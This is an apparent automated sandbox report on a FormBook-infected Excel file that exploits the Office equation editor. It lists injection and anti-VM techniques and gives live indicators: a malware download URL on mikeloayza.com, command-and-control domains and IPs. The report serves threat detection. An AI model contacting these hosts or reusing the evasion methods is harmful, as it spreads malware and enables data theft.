          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wininit.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 4.2.Pcportk28.exe.259637c.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.259e388.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.25b30a4.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Pcportk28.exe PID: 2124, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Pcportk28.exe, 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: Pcportk28.exe, 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\Pcportk28.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\Pcportk28.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exeRDTSC instruction interceptor: First address: 00000000000E8604 second address: 00000000000E860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exeRDTSC instruction interceptor: First address: 00000000000E899E second address: 00000000000E89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2780Thread sleep time: -180000s >= -30000s
          Source: C:\Users\Public\Pcportk28.exe TID: 836Thread sleep time: -34932s >= -30000s
          Source: C:\Users\Public\Pcportk28.exe TID: 2128Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\wininit.exe TID: 672Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\SysWOW64\wininit.exeLast function: Thread delayed
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004088D0 rdtsc
          Source: C:\Users\Public\Pcportk28.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Pcportk28.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\Pcportk28.exeThread delayed: delay time: 34932
          Source: C:\Users\Public\Pcportk28.exeThread delayed: delay time: 922337203685477
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmpBinary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: Pcportk28.exe, 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmpBinary or memory string: +Qemu
          Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.487654318.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_004088D0 rdtsc
          Source: C:\Users\Public\Pcportk28.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wininit.exeProcess token adjusted: Debug
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008626F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 7_2_025326F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Pcportk28.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wininit.exeProcess queried: DebugPort
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00409B40 LdrLoadDll,
          Source: C:\Users\Public\Pcportk28.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.executive-air.net
          Source: C:\Windows\explorer.exeDomain query: www.bitcointradel.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.209.73 80
          Source: C:\Windows\explorer.exeDomain query: www.freeadakahamazon.com
          Source: C:\Windows\explorer.exeNetwork Connect: 118.67.131.217 80
          Source: C:\Windows\explorer.exeDomain query: www.fisioletsgo.com
          Source: C:\Windows\explorer.exeDomain query: www.luckyfandom.com
          Source: C:\Windows\explorer.exeNetwork Connect: 216.239.34.21 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\Pcportk28.exeSection unmapped: C:\Windows\SysWOW64\wininit.exe base address: 6F0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\Pcportk28.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\Pcportk28.exeSection loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write
          Source: C:\Users\Public\Pcportk28.exeSection loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wininit.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wininit.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\Pcportk28.exeMemory written: C:\Users\Public\Pcportk28.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\Pcportk28.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\Pcportk28.exeThread register set: target process: 1764
          Source: C:\Windows\SysWOW64\wininit.exeThread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Users\Public\Pcportk28.exeProcess created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"
          Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmpBinary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmpBinary or memory string: Program Manager<
          Source: C:\Users\Public\Pcportk28.exeQueries volume information: C:\Users\Public\Pcportk28.exe VolumeInformation
          Source: C:\Users\Public\Pcportk28.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\Public\Pcportk28.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1DLL Side-Loading1Process Injection612Masquerading111OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsDLL Side-Loading1Modify Registry1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol114SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing23Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 553293 Sample: SWIFT - Copy - Copy.xlsx Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Antivirus detection for URL or domain 2->56 58 15 other signatures 2->58 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 53 12 2->15         started        process3 dnsIp4 44 mikeloayza.com 131.153.37.4, 443, 49167, 49168 SSASN2US United States 10->44 32 C:\Users\user\AppData\Local\...\i4L[1].exe, PE32 10->32 dropped 34 C:\Users\Public\Pcportk28.exe, PE32 10->34 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->76 17 Pcportk28.exe 1 5 10->17         started        36 C:\Users\user\...\~$SWIFT - Copy - Copy.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 46 Machine Learning detection for dropped file 17->46 48 Tries to detect virtualization through RDTSC time measurements 17->48 50 Injects a PE file into a foreign processes 17->50 20 Pcportk28.exe 17->20         started        process9 signatures10 60 Modifies the context of a thread in another process (thread injection) 20->60 62 Maps a DLL or memory area into another process 20->62 64 Sample uses process hollowing technique 20->64 66 Queues an APC in another process (thread injection) 20->66 23 explorer.exe 20->23 injected process11 dnsIp12 38 www.luckyfandom.com 118.67.131.217, 49173, 80 CLEAR-AS-APClearNetworksPtyLtdAU Korea Republic of 23->38 40 bitcointradel.com 162.0.209.73, 49171, 80 ACPCA Canada 23->40 42 5 other IPs or domains 23->42 68 System process connects to network (likely due to code injection or exploit) 23->68 27 wininit.exe 23->27         started        signatures13 process14 signatures15 70 Modifies the context of a thread in another process (thread injection) 27->70 72 Maps a DLL or memory area into another process 27->72 74 Tries to detect virtualization through RDTSC time measurements 27->74 30 cmd.exe 27->30         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SWIFT - Copy - Copy.xlsx100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\Pcportk28.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.Pcportk28.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.Pcportk28.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.Pcportk28.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.Pcportk28.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          mikeloayza.com3%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://mikeloayza.com/E9/i4L.exe100%Avira URL Cloudmalware
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://www.bitcointradel.com/i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p0%Avira URL Cloudsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.fisioletsgo.com/i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p0%Avira URL Cloudsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.luckyfandom.com/i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p0%Avira URL Cloudsafe
          www.healingandhealthy.com/i6ro/0%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.executive-air.net/i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          https://mikeloayza.com/E9/i4L.exe100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.luckyfandom.com
          118.67.131.217
          truetrue
            unknown
            mikeloayza.com
            131.153.37.4
            truetrueunknown
            bitcointradel.com
            162.0.209.73
            truetrue
              unknown
              executive-air.net
              34.102.136.180
              truefalse
                unknown
                www.fisioletsgo.com
                216.239.34.21
                truefalse
                  unknown
                  www.executive-air.net
                  unknown
                  unknowntrue
                    unknown
                    www.bitcointradel.com
                    unknown
                    unknowntrue
                      unknown
                      www.freeadakahamazon.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://mikeloayza.com/E9/i4L.exetrue
                        • Avira URL Cloud: malware
                        unknown
                        http://www.bitcointradel.com/i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684ptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fisioletsgo.com/i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684pfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.luckyfandom.com/i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684ptrue
                        • Avira URL Cloud: safe
                        unknown
                        www.healingandhealthy.com/i6ro/true
                        • Avira URL Cloud: safe
                        low
                        http://www.executive-air.net/i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684pfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://mikeloayza.com/E9/i4L.exetrue
                        • Avira URL Cloud: malware
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpfalse
                          high
                          http://investor.msn.comexplorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpfalse
                            high
                            http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpfalse
                              high
                              http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpfalse
                                high
                                http://treyresearch.netexplorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpfalse
                                  high
                                  http://java.sun.comexplorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmpfalse
                                    high
                                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmpfalse
                                      high
                                      http://investor.msn.com/explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpfalse
                                        high
                                        http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.499989252.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551993194.0000000004513000.00000004.00000001.sdmpfalse
                                          high
                                          http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.%s.comPAexplorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmpfalse
                                          • URL Reputation: safe
                                          low
                                          http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpfalse
                                            high
                                            https://support.mozilla.orgexplorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpfalse
                                              high
                                              http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.551082192.0000000003E50000.00000002.00020000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              162.0.209.73
                                              bitcointradel.comCanada
                                              35893ACPCAtrue
                                              216.239.34.21
                                              www.fisioletsgo.comUnited States
                                              15169GOOGLEUSfalse
                                              118.67.131.217
                                              www.luckyfandom.comKorea Republic of
                                              24395CLEAR-AS-APClearNetworksPtyLtdAUtrue
                                              34.102.136.180
                                              executive-air.netUnited States
                                              15169GOOGLEUSfalse
